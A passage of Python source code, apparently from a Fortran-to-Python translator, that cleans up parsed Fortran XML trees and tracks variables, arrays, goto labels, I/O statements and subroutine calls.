assert False, f'In handle_tag_type: "{child.tag}" not ' \
f'handled'
# This will mark whether this type declaration is for a derived type
# declaration or not
current.set("is_derived_type", str(self.is_derived_type))
def handle_tag_variables(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the variables elements.
<variables>
</variables>
"""
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
if (
child.tag == "variable"
and self.current_scope in self.argument_types
and child.attrib['name'] in self.argument_types[
self.current_scope]
):
self.argument_types[self.current_scope][child.attrib[
'name']] = self.variable_type
# Up to this point, all the child (nested or sub) elements were
# <variable>
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
cur_elem.set("is_array", str(self.is_array).lower())
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
if (
child.tag == "variable"
and child.attrib
):
grandparent = ET.SubElement(
current, child.tag, child.attrib
)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
child.tag == "variable"
), f'In handle_tag_variables: "{child.tag}" not handled'
def handle_tag_variable(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the variables elements.
<variable>
</variable>
"""
# Store all declared variables based on their array status
if current.attrib['is_array'] == "true":
self.declared_array_vars.update(
{current.attrib['name']: self.current_scope}
)
else:
self.declared_non_array_vars.update(
{current.attrib['name']: self.current_scope}
)
if self.is_character:
self.character_var_list.append(current.attrib['name'])
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag in self.variable_child_tags:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
if child.tag == "dimensions":
current.attrib['is_array'] = "true"
self.declared_array_vars.update(
{current.attrib['name']: self.current_scope}
)
del self.declared_non_array_vars[current.attrib['name']]
current.remove(self.dimensions_holder)
else:
assert (
False
), f'In handle_tag_variable: "{child.tag}" not handled'
else:
if child.tag == "entity-decl":
current.attrib.update(child.attrib)
else:
assert (
False
), f'In handle_tag_variable: Empty elements "{child.tag}"' \
f' not handled'
def handle_tag_constants(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements between the
constants elements.
<constants>
</constants>
"""
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
cur_elem.set("is_array", str(self.is_array).lower())
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
elif child.tag == "parameter-stmt":
pass
else:
assert (
child.tag == "constant"
), f'In handle_tag_constant: "{child.tag}" not handled'
def handle_tag_constant(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements between the
constants elements.
<constant>
</constant>
"""
# Store all declared variables based on their array status
if current.attrib['is_array'] == "true":
self.declared_array_vars.update(
{current.attrib['name']: self.current_scope}
)
else:
self.declared_non_array_vars.update(
{current.attrib['name']: self.current_scope}
)
for child in root:
self.clean_attrib(child)
if child.text or len(child) > 0:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_constant: Empty elements "{child.tag}" ' \
f'not handled'
def handle_tag_statement(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the statement elements.
<statement>
</statement>
"""
if traverse == 1:
current.attrib['body-level'] = self.body_level['current']
for child in root:
self.clean_attrib(child)
if child.tag in self.statement_child_tags:
if child.tag == "stop":
self.is_stop = True
current.attrib['has-stop'] = "true"
current.attrib['goto-remove'] = "true"
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "label":
current.attrib['label'] = child.attrib['lbl']
label_presented = True
lbl = child.attrib['lbl']
self.encountered_goto_label.append(lbl)
if traverse == 1:
# Label-before case
if (
not self.goto_target_lbl_after
or lbl not in self.goto_target_lbl_after
):
self.goto_label_with_case[lbl] = "before"
# Since we want to handle label_after case before
# label_before when both cases appear in the code,
# we ignore all label_before case until _after case
# get handled. Thus, mark label_before to false
if self.label_after:
self.label_before = False
else:
self.label_before = True
if lbl not in self.label_lbl_for_before:
self.label_lbl_for_before.append(lbl)
# Label-after case
else:
self.goto_label_with_case[lbl] = "after"
self.collect_stmts_after_goto = False
self.collect_stmts_after_label = True
if lbl not in self.label_lbl_for_after:
self.label_lbl_for_after.append(lbl)
if (
self.label_before
or lbl in self.label_lbl_for_before
):
current.attrib['goto-move'] = "true"
else:
current.attrib['goto-remove'] = "true"
current.attrib['target-label-statement'] = "true"
# Since <format> is followed by <label>,
# check the case and undo all operations done for goto.
if child.tag == "format" and label_presented:
del self.label_lbl[-1]
del current.attrib['target-label-statement']
del current.attrib['goto-move']
self.label_before = False
else:
assert (
traverse > 1
), "In handle_tag_statement. Reconstruction must be " \
"done in traverse > 1."
if self.collecting_stmts_done:
self.reconstruct_after_case_now = True
self.collecting_stmts_done = False
if child.text or len(child) > 0:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
elif child.tag == "name":
# If a 'name' tag is the direct sub-elements of 'statement',
# it's an indication of this statement is handling
# (usually assignment) derived type variables. Thus,
# in order to make concurrent with other assignment syntax,
# remove the outside name elements (but store it to the
# temporary holder) and reconstruct it before the end of
# statement
assert is_empty(self.derived_type_var_holder_list)
self.derived_type_var_holder_list.append(child.attrib['id'])
self.parseXMLTree(
child, current, current, parent, traverse
)
elif child.tag == "goto-stmt":
# self.goto_stmt_level = parent.attrib['parent']
# <goto-stmt> met, increment the counter
self.goto_stmt_counter += 1
# If goto-stmt was seen, we do not construct element for it.
# However, we collect the information (attributes) that is
# associated to the existing OFP generated element
self.need_goto_elimination = True
self.if_appear_before_goto = False
target_lbl = child.attrib['target_label']
current.attrib['goto-stmt'] = "true"
current.attrib['lbl'] = target_lbl
_ = ET.SubElement(current, child.tag, child.attrib)
# Reaching goto-stmt is a flag to stop collecting states
if traverse == 1:
if (
"type" in parent.attrib
and parent.attrib['type'] == "else"
):
self.goto_under_else = True
self.encountered_goto_label.append(target_lbl)
if self.collect_stmts_after_label:
current.attrib['goto-remove'] = "true"
current.attrib['next-goto'] = "true"
self.statements_to_reconstruct_after[
'stmts-follow-label'].append(current)
self.collect_stmts_after_label = False
self.collecting_stmts_done = True
# A case where label appears "before" goto
if target_lbl in self.label_lbl_for_before:
self.goto_label_with_case[target_lbl] = "before"
self.statements_to_reconstruct_before[
'count-gotos'] += 1
self.goto_target_lbl_before.append(target_lbl)
# A case where label appears "after" goto
else:
self.goto_label_with_case[target_lbl] = "after"
self.statements_to_reconstruct_after['count-gotos'] += 1
if "parent-goto" not in current.attrib:
current.attrib['skip-collect'] = "true"
self.goto_target_lbl_after.append(target_lbl)
self.collect_stmts_after_goto = True
self.label_after = True
else:
if target_lbl in self.label_lbl_for_before:
assert (
traverse > 1
), "Reconstruction cannot happen in the first traverse"
if self.label_before:
self.reconstruct_before_case_now = True
return
else:
assert (
False
), f'In handle_tag_statement: "{child.tag}" not handled'
# Statement collector (1st traverse)
if traverse == 1:
if self.label_before and not self.label_after:
# Since we do not want to extract the stop statement from
# that is not a main body, check it before extraction
if "has-stop" not in current.attrib:
current.attrib['goto-move'] = "true"
self.statements_to_reconstruct_before[
'stmts-follow-label'].append(current)
else:
if (
parent.tag == "body"
and parent.attrib['parent'] == "program"
):
self.statements_to_reconstruct_before[
'stmts-follow-label'].append(current)
elif self.label_after:
if self.collect_stmts_after_goto:
current.attrib['goto-remove'] = "true"
if "has-stop" not in current.attrib:
self.statements_to_reconstruct_after[
'stmts-follow-goto'].append(current)
else:
if (
parent.tag == "body"
and parent.attrib['parent'] == "program"
):
self.statements_to_reconstruct_after[
'stmts-follow-goto'].append(current)
if "goto-stmt" in current.attrib:
self.stmts_after_goto['goto-stmts'].append(
current.attrib['lbl'])
elif "target-label-statement" in current.attrib:
self.stmts_after_goto['labels'].append(
current.attrib['label'])
elif self.collect_stmts_after_label:
current.attrib['goto-remove'] = "true"
self.statements_to_reconstruct_after[
'stmts-follow-label'].append(current)
if (
(
parent.tag == "body"
and parent.attrib['parent'] == "program"
and "has-stop" in current.attrib
)
or self.goto_under_loop
):
self.collect_stmts_after_label = False
self.reconstruct_after_case_now = True
def handle_tag_assignment(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the assignment elements.
<assignment>
</assignment>
"""
for child in root:
self.clean_attrib(child)
cur_elem = ET.SubElement(current, child.tag, child.attrib)
if child.tag == "target" or child.tag == "value":
self.parseXMLTree(child, cur_elem, current, parent, traverse)
else:
assert (
False
), f'In handle_tag_assignment: "{child.tag}" not handled'
def handle_tag_target(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the target elements.
<target>
</target>
"""
for child in root:
self.clean_attrib(child)
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "name":
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
if child.tag == "name" and self.need_reconstruct:
self.reconstruct_name_element(cur_elem, current)
else:
assert (
False
), f'In handle_tag_target: "{child.tag}" not handled'
def handle_tag_names(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the names elements.
<names>
<names>
"""
for child in root:
self.clean_attrib(child)
if child.tag == "name":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if "id" in child.attrib and self.is_interface:
self.interface_functions[self.cur_interface_name].append(
child.attrib['id'])
self.interface_function_xml[self.cur_interface_name][
child.attrib['id']] = cur_elem
if grandparent.tag == "function":
self.args_for_function.append(cur_elem.attrib['id'])
# If the element holds sub-elements, call the XML tree parser
# with created new <name> element
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
# Else, update the element's attribute
# with the default <name> element attributes
else:
attributes = {
"hasSubscripts": "false",
"is_array": "false",
"numPartRef": "1",
"type": "ambiguous",
}
# Check if the variable is a function argument
if self.is_function_arg:
attributes['is_arg'] = "true"
else:
attributes['is_arg'] = "false"
cur_elem.attrib.update(attributes)
else:
assert False, f'In handle_tag_names: "{child.tag}" not handled'
def handle_tag_name(self, root, current, parent, _, traverse):
"""This function handles cleaning up the XML elements between
the name elements.
<name>
<name>
There are three different types of names that the type attribute can
hold:
(1) variable - Simple (single) variable or an array
(2) procedure - Function (or procedure) call
(3) ambiguous - None of the above two type
"""
if (
"id" in current.attrib
and current.attrib['id'] in self.declared_array_vars
):
current.attrib['is_array'] = "true"
else:
current.attrib['is_array'] = "false"
# If 'id' attribute holds '%' symbol, it's an indication of derived type
# referencing. Thus, clean up the 'id' and reconstruct the <name> AST.
if "id" in current.attrib and "%" in current.attrib['id']:
self.is_derived_type_ref = True
self.clean_derived_type_ref(current)
# Default attribute values
current.attrib['hasSubscripts'] = "false"
current.attrib['is_arg'] = "false"
current.attrib['numPartRef'] = "1"
current.attrib['type'] = "ambiguous"
for child in root:
self.clean_attrib(child)
if child.text:
if (
child.tag == "subscripts"
or child.tag == "assignment"
):
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "subscripts":
# If current name is for caller arguments,
# mark the name of the function in the subscripts
# as an one of its attributes
if parent.tag == "call":
cur_elem.attrib['fname'] = current.attrib['id']
current.attrib['hasSubscripts'] = "true"
# Check whether the variable is an array AND the
# variable is for the current scope. This is important
# for derived type variable referencing
if (
current.attrib['id'] in self.declared_array_vars
and self.declared_array_vars[
current.attrib['id']
] == self.current_scope
):
# Since the procedure "call" has a same AST syntax
# as an array, check its type and set the "is_array"
# value
assert (
current.attrib['type'] != "procedure"
), "Trying to assign a procedure call to while " \
"is_array true."
current.attrib['is_array'] = "true"
elif (
current.attrib['id']
in self.declared_non_array_vars
and self.declared_non_array_vars[
current.attrib['id']
] == self.current_scope
and current.attrib['id'] not in
self.character_var_list
):
current.attrib['hasSubscripts'] = "false"
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
elif child.tag == "output":
assert (
is_empty(self.derived_type_var_holder_list)
), "derived_type_var holder must be empty."
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.derived_type_var_holder_list.append(root.attrib['id'])
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
elif child.tag == "name":
self.parseXMLTree(
child, current, current, parent, traverse
)
else:
assert (
False
), f'In self.handle_tag_name: "{child.tag}" not handled'
else:
if child.tag == "generic_spec":
_ = ET.SubElement(
current, child.tag, child.attrib
)
elif child.tag == "data-ref":
current.attrib.update(child.attrib)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In self.handle_tag_name: Empty elements ' \
f'"{child.tag}" not handled'
# If the name element is for handling
# derived type references, reconstruct it
if self.derived_type_refs:
self.reconstruct_derived_type_names(current)
self.is_derived_type_ref = False
self.need_reconstruct = True
def handle_tag_value(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the value elements.
<value>
</value>
"""
function_call = False
for child in root:
self.clean_attrib(child)
cur_elem = ET.SubElement(current, child.tag, child.attrib)
if (
child.tag == "name"
and child.attrib['id'] in self.arguments_list
):
# if 'id' is in the arguments_list, it indicates that
# the RHS of the assignment is a function call
self.call_function = True
function_call = True
current.attrib['fname'] = child.attrib['id']
try:
_ = self.value_child_tags.index(child.tag)
except ValueError:
assert False, f'In handle_tag_value: "{child.tag}" not handled'
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
# If current assignment is done with a function call,
# then update function definition's arguments with array status
if function_call:
self.update_function_arguments(current)
if (
child.tag == "name"
and self.need_reconstruct
):
self.reconstruct_name_element(cur_elem, current)
def handle_tag_literal(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the literal elements.
<literal>
</literal>
"""
if '"' in current.attrib['value']:
current.attrib['value'] = self.clean_id(current.attrib['value'])
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
if child.tag == "stop":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
elif child.tag == "literal":
cur_elem = ET.SubElement(
parent, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, parent, grandparent, traverse
)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_literal: "{child.tag}" not handled'
else:
if child.tag == "data-stmt-constant":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_literal: Empty "{child.tag}" not handled'
def handle_tag_dimensions(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the dimensions elements.
<dimensions>
</dimensions>
"""
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "dimension":
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_dimensions: "{child.tag}" not ' \
f'handled'
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_dimensions: Empty "{child.tag}" not ' \
f'handled'
if parent.tag == "variable":
self.dimensions_holder = current
def handle_tag_dimension(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the dimension elements.
<dimension>
</dimension>
"""
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if (
child.tag == "literal"
or child.tag == "range"
):
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_dimension: "{child.tag}" not handled'
elif child.tag == "literal":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_dimension: Empty "{child.tag}" not ' \
f'handled'
def handle_tag_loop(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the do loop elements.
<loop>
</loop>
"""
for child in root:
self.clean_attrib(child)
if child.text or len(child) > 0:
if child.tag in self.loop_child_tags:
if child.tag == "format":
self.is_format = True
self.format_holder.append(child)
else:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
child.tag in self.unnecessary_tags
), f'In self.handle_tag_loop: "{child.tag}" not handled'
def handle_tag_index_variable_or_range(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the index_variable or range elements.
<index_variable> or <range>
</index_variable> </range>
"""
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag in self.index_range_child_tags:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
child.tag in self.unnecessary_tags
), f'In handle_tag_index_variable_or_range: "{child.tag}"' \
f' not handled'
else:
if traverse > 1:
_ = ET.SubElement(
current, child.tag, child.attrib
)
else:
assert (
child.tag in self.unnecessary_tags
), f'In handle_tag_index_variable_or_range: Empty ' \
f'"{child.tag}" not handled'
def handle_tag_bound(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the upper_bound elements.
<upper_bound>
</upper_bound>
"""
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag in self.bound_child_tags:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
if (
child.tag == "name"
and self.need_reconstruct
):
self.reconstruct_name_element(cur_elem, current)
else:
assert (
child.tag in self.unnecessary_tags
), f'In handle_tag_upper_bound: "{child.tag}" not handled'
else:
if traverse > 1:
_ = ET.SubElement(
current, child.tag, child.attrib
)
else:
assert (
child.tag in self.unnecessary_tags
), f'In handle_tag_upper_bound: Empty "{child.tag}" not ' \
f'handled'
def handle_tag_subscripts(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the subscripts elements.
<subscripts>
</subscripts>
"""
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "subscript":
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In self.handle_tag_subscripts: "{child.tag}" not ' \
f'handled'
def handle_tag_subscript(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the subscript elements.
<subscript>
</subscript>
"""
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
try:
_ = self.subscripts_child_tags.index(child.tag)
except ValueError:
assert (
False
), f'In self.handle_tag_subscript: "{child.tag}" not ' \
f'handled'
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
# If current subscript is for a function caller and
# current element (argument) is an array, then store
# it into the caller_arr_arguments map for later use
if (
self.call_function
and (cur_elem.tag == "name"
and cur_elem.attrib['is_array'] == "true")
):
assert (
"fname" in parent.attrib
), "If this subscript is for the caller argument,\
fname must exist in the parent"
fname = parent.attrib['fname']
arg = cur_elem.attrib['id']
if fname in self.caller_arr_arguments:
self.caller_arr_arguments[fname].append(arg)
else:
self.caller_arr_arguments[fname] = [arg]
def handle_tag_operation(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the operation elements.
<operation>
</operation>
"""
for child in root:
self.clean_attrib(child)
# A process of negating the operator during goto elimination
if (
child.tag == "operator"
and self.need_op_negation
):
child.attrib['operator'] = \
syntax.NEGATED_OP[child.attrib['operator']]
self.need_op_negation = False
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "operand":
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
if child.tag != "operator":
assert (
False
), f'In handle_tag_operation: "{child.tag}" not handled'
def handle_tag_operand(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the operation elements.
<operand>
</operand>
"""
for child in root:
self.clean_attrib(child)
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
try:
_ = self.operand_child_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_operand: "{child.tag}" not handled'
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
if (
child.tag == "name"
and self.need_reconstruct
):
self.reconstruct_name_element(cur_elem, current)
def handle_tag_write(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the operation elements.
<operand>
</operand>
"""
for child in root:
self.clean_attrib(child)
if child.text or len(child) > 0:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if (
child.tag == "io-controls"
or child.tag == "outputs"
):
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_write: "{child.tag}" not handled'
def handle_tag_io_controls(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the io-controls elements.
<io-controls>
</io-controls>
"""
for child in root:
self.clean_attrib(child)
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.text or len(child) > 0:
if child.tag == "io-control":
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_io_controls: "{child.tag}" not handled'
def handle_tag_io_control(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the io-control elements.
<io-control>
</io-control>
"""
for child in root:
self.clean_attrib(child)
# To make io-control elements simpler, the code below
# will append io-control-spec's attributes to its
# parent (io-control). This will eliminate at least
# one recursion in translate.py to retrieve
# the io-control information
if child.tag == "io-control-spec":
current.attrib.update(child.attrib)
if child.text:
cur_elem = ET.SubElement(current, child.tag, child.attrib)
if child.tag == "io-control" or child.tag == "literal":
self.parseXMLTree(child, cur_elem, current, parent,
traverse)
else:
assert False, f'In handle_tag_io_control: "{child.tag}" ' \
f'not handled'
else:
if child.tag == "literal":
_ = ET.SubElement(current, child.tag, child.attrib)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert False, f'In handle_tag_io_control: Empty "' \
f'{child.tag}" not handled'
def handle_tag_outputs(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the outputs elements.
<outputs>
</outputs>
"""
for child in root:
self.clean_attrib(child)
if child.tag == "output":
cur_elem = ET.SubElement(current, child.tag, child.attrib)
self.parseXMLTree(child, cur_elem, current, parent, traverse)
elif child.tag == "name":
self.parseXMLTree(child, current, current, parent, traverse)
else:
assert (
False
), f'In handle_tag_outputs: "{child.tag}" not handled'
def handle_tag_output(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the output elements.
<output>
</output>
"""
for child in root:
self.clean_attrib(child)
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag in self.output_child_tags:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
if child.tag == "name" and self.need_reconstruct:
self.reconstruct_name_element(cur_elem, current)
else:
assert (
False
), f'In handle_tag_outputs: "{child.tag}" not handled'
def handle_tag_format(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the format elements.
<format>
</format>
"""
for child in root:
self.clean_attrib(child)
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "format-items":
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
if child.tag != "label":
assert (
False
), f'In handle_tag_format: "{child.tag}" not handled'
def handle_tag_format_items(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the format_items and its sub-elements
<format_items>
____<format_item>
____</format_item>
</format_items>
"""
for child in root:
self.clean_attrib(child)
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "format-items" or child.tag == "format-item":
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_format_items: "{child.tag}" not handled'
def handle_tag_print(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the print tags.
<print>
</print>
"""
for child in root:
self.clean_attrib(child)
if child.tag != "print-stmt":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "outputs":
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_print: "{child.tag}" not handled'
def handle_tag_open(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the open elements.
<open>
</open>
"""
for child in root:
self.clean_attrib(child)
if child.text:
if child.tag == "keyword-arguments":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_open: "{child.tag}" not handled'
else:
if child.tag == "open-stmt":
current.attrib.update(child.attrib)
else:
assert (
False
), f'In handle_tag_open: Empty elements "{child.tag}" ' \
f'ot handled'
def handle_tag_keyword_arguments(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements between
the keyword-arguments and keyword-argument elements.
<keyword-arguments>
____<keyword-argument>
____</keyword-argument>
</keyword-arguments>
"""
for child in root:
self.clean_attrib(child)
if child.text:
if (
child.tag == "keyword-argument"
or child.tag == "literal"
):
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_keyword_arguments: "{child.tag}" not ' \
f'handled'
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_keyword_arguments: Empty elements ' \
f'"{child.tag}" not handled'
def handle_tag_read(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the read elements.
<read>
</read>
"""
for child in root:
self.clean_attrib(child)
if child.text:
if (
child.tag == "io-controls"
or child.tag == "inputs"
):
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_read: "{child.tag}" not handled'
else:
if child.tag == "read-stmt":
current.attrib.update(child.attrib)
else:
assert (
False
), f'In handle_tag_read: Empty elements "{child.tag}" ' \
f'not handled'
def handle_tag_inputs(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the inputs and input elements.
<inputs>
____<input>
____</input>
</inputs>
"""
for child in root:
self.clean_attrib(child)
if child.text:
if (
child.tag == "input"
or child.tag == "name"
):
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_input - {root.tag}: "{child.tag}" not ' \
f'handled'
else:
assert (
False
), f'In handle_tag_input - {root.tag}: Empty elements ' \
f'"{child.tag}" not handled'
def handle_tag_close(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the close elements.
<close>
</close>
"""
for child in root:
self.clean_attrib(child)
if child.text:
if child.tag == "keyword-arguments":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_close: "{child.tag}" not handled'
else:
if child.tag == "close-stmt":
current.attrib.update(child.attrib)
else:
assert (
False
), f'In handle_tag_close: Empty elements "{child.tag}"'
def handle_tag_call(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the call elements.
<call>
</call>
"""
self.call_function = True
for child in root:
self.clean_attrib(child)
if child.text:
if child.tag == "name":
# fname: Function name
current.attrib['fname'] = child.attrib['id']
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_call: "{child.tag}" not handled'
else:
if child.tag == "call-stmt":
current.attrib.update(child.attrib)
else:
assert (
False
), f'In handle_tag_call: Empty elements "{child.tag}"'
# Update call function definition's arguments with array status
self.update_function_arguments(current)
# Update call function arguments with their types
update = False
arguments_info = []
self.update_call_argument_type(current, update, self.current_scope, arguments_info)
# If modules been used in the current program, check for interface functions
# and replace function names, if necessary.
if self.used_modules:
self.replace_interface_function_to_target(current, arguments_info)
def handle_tag_subroutine(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the subroutine elements.
<subroutine>
</subroutine>
"""
self.argument_types[root.attrib['name']] = {}
self.current_scope = root.attrib['name']
for child in root:
self.clean_attrib(child)
if child.text:
if child.tag == "header" or child.tag == "body":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "body":
self.current_body_scope = cur_elem
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_subroutine: "{child.tag}" not handled'
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_subroutine: Empty elements "{child.tag}"'
# Updating the argument attribute to hold the type.
for arg in self.arguments_list[current.attrib['name']]:
if arg.attrib['name'] in self.argument_types[current.attrib['name']]:
arg.attrib['type'] = str(self.argument_types[current.attrib['name']][arg.attrib['name']])
# Add extra XMLs under the interface function names to hold the argument types.
for interface in self.interface_function_xml:
if current.attrib['name'] in self.interface_function_xml[interface]:
argument_types = ET.SubElement(
self.interface_function_xml[interface][current.attrib['name']],
"argument-types"
)
num_args = 0
for arg in self.arguments_list[current.attrib['name']]:
num_args += 1
argument_type = ET.SubElement(
argument_types,
"argument-type",
{"type": arg.attrib['type']}
)
self.interface_function_xml[interface][current.attrib['name']].attrib['num_args'] = str(num_args)
def handle_tag_arguments(
self, root, current, _, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the arguments.
<arguments>
</arguments>
"""
num_of_args = int(root.attrib['count'])
if self.is_interface_member:
if grandparent.tag == "subroutine":
for interface in self.interface_functions:
if (
grandparent.attrib['name'] in self.interface_functions[interface]
and interface in self.interface_xml
):
if (
"max_arg" not in self.interface_xml[interface].attrib
